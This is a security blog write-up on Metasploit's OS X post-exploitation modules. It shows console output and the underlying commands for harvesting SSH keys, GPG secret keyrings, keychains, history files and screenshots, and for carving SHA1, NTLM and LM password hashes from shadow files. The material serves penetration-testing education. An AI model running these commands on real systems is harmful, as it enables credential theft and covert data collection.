Hello boys and girls!
Carlos was kind enough to share some of his brand new OS X post exploitation kung-fu during episode 232.
I know there are a lot of you that still like to believe that OS X does not really matter. However, it is finally getting a respectable market share of 10.9%. And, while it may be fun to bash on Apple from time to time, you will stop laughing when you need to exploit an OS X system and pull data from the target machine. Thankfully, Carlos has made the process of post exploitation far easier for all of us. For that we all owe him a beer or two. After all, the only thing Paul has done successfully with a Mac over the past few years from a post-exploitation perspective was pour beer in his Mac.
So, on to the good stuff.
in today’s write-up we will cover 2 new enumeration modules against OS X machines that where added to Metasploit. These modules are:
- use post/osx/gather/enum_osx
- use post/osx/gather/hashdump
We will cover the shell commands used by the modules themselves. One of the advantages of post exploitation modules versus the typical Meterpreter script is that they can be written to be used against both shell and Meterpreter. This initial OS X modules are written and tested for shell but many of the tasks are already written to work for Meterpreter once some issues with the Java Meterpreter are fixed.
Lets start with the OS X Enumeration module. For reasons of demo you will see that we have 2 shell sessions:


msf exploit(handler) > sessions
Active sessions
===============
Id  Type       Information  Connection
--  ----       -----------  ----------
1   shell osx               192.168.1.100:4446 -> 192.168.1.100:54010
2   shell osx               192.168.1.100:4446 -> 192.168.1.100:54013


Session 1 is running as a regular user on a OS X Snow Leopard target and Session 2 is running as root on the same box. The enumeration script will alter its behavior depending on the privilege level it sees it has on the target box and also will alter the commands depending on the version of OSX it is running against. To select the module we use the use command and after selecting we can have a look at the info of the module and the options it provides:


msf exploit(handler) > use post/osx/gather/enum_osx
msf post(enum_osx) > info
Name: Mac OS X Information Enumeration
Module: post/osx/gather/enum_osx
Version: 11816
Platform: OSX
Arch:
Rank: Normal
Provided by:
Carlos Perez carlos_perez@darkoperator.com
Description:
This module does initial gathering of information from OSX Tiger,
Leopard and Snow Leopard System
msf post(enum_osx) > show options
Module options (post/osx/gather/enum_osx):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION                   yes       The session to run this module on.


To specify a session to run against we just set the option in the Datastore to the number of the session we want to run against


msf post(enum_osx) > set SESSION 1
SESSION => 1


once we have a session selected the only thing we need to do is issue the command run


msf post(enum_osx) > run
[*] Running module against loki.local
[*] Saving all data to /Users/cperez/.msf3/logs/post/enum_osx/loki.local_20110224.0303
[*]     Enumerating Development Tools
[*]     Enumerating Airport
[*]     Enumerating Applications
[*]     Enumerating Ethernet
[*]     Enumerating Bluetooth
[*]     Enumerating Logs
[*]     Enumerating Known Networks
[*]     Enumerating Firewall
[*]     Enumerating USB
[*]     Enumerating OS
[*]     Enumerating Network
[*]     Enumerating StartUp
[*]     Enumerating Printers
[*]     Enumerating Preference Panes
[*]     Enumerating Frameworks
[*]     Enumerating Environment Variables
[*]     Enumerating UDP Connections
[*]     Enumerating TCP Connections
[*]     Enumerating Current Activity
[*]     Enumerating Process List
[*]     Enumerating Last Boottime
[*]     Enumerating Groups
[*]     Enumerating Users
[*] .ssh Folder is present
[*]     Downloading config
[*]     Downloading id_dsa
[*]     Downloading id_dsa.pub
[*]     Downloading known_hosts
[*] .gnupg Folder is present
[*]     Downloading gpg.conf
[*]     Downloading pubring.gpg
[*]     Downloading pubring.gpg~
[*]     Downloading random_seed
[*]     Downloading secring.gpg
[*]     Downloading trustdb.gpg
[*] Capturing screenshot
[*] Screenshot Captured
[*] Extracting bash history
[*]     History file .bash_history found for cperez
[*]     Downloading .bash_history
[*]     History file .irb_history found for cperez
[*]     Downloading .irb_history
[*]     History file .scapy_history found for cperez
[*]     Downloading .scapy_history
[*]     History file .sh_history found for cperez
[*]     Downloading .sh_history
[*]     History file .sqlite_history found for cperez
[*]     Downloading .sqlite_history
[*] Enumerating and Downloading keychains for cperez
[*] Post module execution completed
msf post(enum_osx) >


As it can be seen the modules gathers a lot of data on the target system starting with configuration, network connection, account information and list of processes, Once it gets all of that info it will check for .ssh and ,gnupg configuration folders and download all configuration files down to the attackers machine. It will do a screen capture followed by the enumeration of any history file found in the users home folder and downloads those. If it is running as root it will extract the SHA1 hashes for the users on the box, if the box is sharing a Samba Share or talks to AD it will also extract the NTLM and LM hashes for the users creating separate files in John the Ripper format for each encryption scheme.
Most of the data collected for configuration is gathered using the system_profiler command, it works by specifying the data type which correspond to a configuration are that we want the information for, to list the supported data types we run the command with -listDataTypes:


loki:~ cperez$ system_profiler -listDataTypes
Available Datatypes:
SPHardwareDataType
SPNetworkDataType
SPSoftwareDataType
SPParallelATADataType
SPAudioDataType
SPBluetoothDataType
SPCardReaderDataType
SPDiagnosticsDataType
SPDiscBurningDataType
SPEthernetDataType
SPFibreChannelDataType
SPFireWireDataType
SPDisplaysDataType
SPHardwareRAIDDataType
SPMemoryDataType
SPPCIDataType
SPParallelSCSIDataType
SPPowerDataType
SPPrintersDataType
SPSASDataType
SPSerialATADataType
SPUSBDataType
SPAirPortDataType
SPFirewallDataType
SPNetworkLocationDataType
SPModemDataType
SPNetworkVolumeDataType
SPWWANDataType
SPApplicationsDataType
SPDeveloperToolsDataType
SPExtensionsDataType
SPFontsDataType
SPFrameworksDataType
SPLogsDataType
SPManagedClientDataType
SPPrefPaneDataType
SPStartupItemDataType
SPSyncServicesDataType
SPUniversalAccessDataType


For connection the netstat command is used


# netstat -np tcp
# netstat -np udp


To get Environment variables we used


# printenv


For Boot Time and current activity the who command


# who -b
# who


For processes


# ps -ea


For enumerating users and groups it varies per version of the OS, for Leopard and above:


# dscacheutil -q user
# dscacheutil -q group


For Tiger and bellow:


# lookupd -q user
# lookups -q group


For Screenshot of the following command is used:
As Root:


# launchctl bsexec {loginwindow PID} screencapture -x screenshot.jpg


As User:


$ screencapture -x screenshot.jpg


For history files the following regex is used to match the most common history file names


\.\w*\_history


This will match any hidden file with the word history at the end.
For dumping hashes the module must run as root, OS X does not store the credentials in a passed or master.passwd file but more like HPUX Trusted mode in individual files by account. Firs thing is we need to get the GUID of the account to do this we run
Leopard and Above:


# dscl localhost -read /Search/Users/{user} | grep GeneratedUID | cut -c15-


Tiger:


# niutil -readprop . /users/{user} generateduid


Now with the GUID we can carve the file with the hashes, the modules carves out SHA, LM and NTLM hashes:
• SHA1:


#/bin/cat /var/db/shadow/hash/{guid}  | cut -c169-216


• NTLM:


# /bin/cat /var/db/shadow/hash/{guid}  | cut -c1-32


• LM:


# /bin/cat /var/db/shadow/hash/{guid}  | cut -c33-64


The last thing the module does is enumerate all keychain files for the users and download them:
• As User:


$ security list-keychains


• As Root:


# sudo -u {username} -i /usr/bin/security list-keychains


I fully expect there will be more from an OS X exploitation perspective over the next few months and years. It is comforting to know that Carlos is already ahead of the curve when it comes to post exploitation on this fine platform.
Brought to you by: Darkoperator and strandjs
Originally discussed during episode 231

About the author

Leave a Reply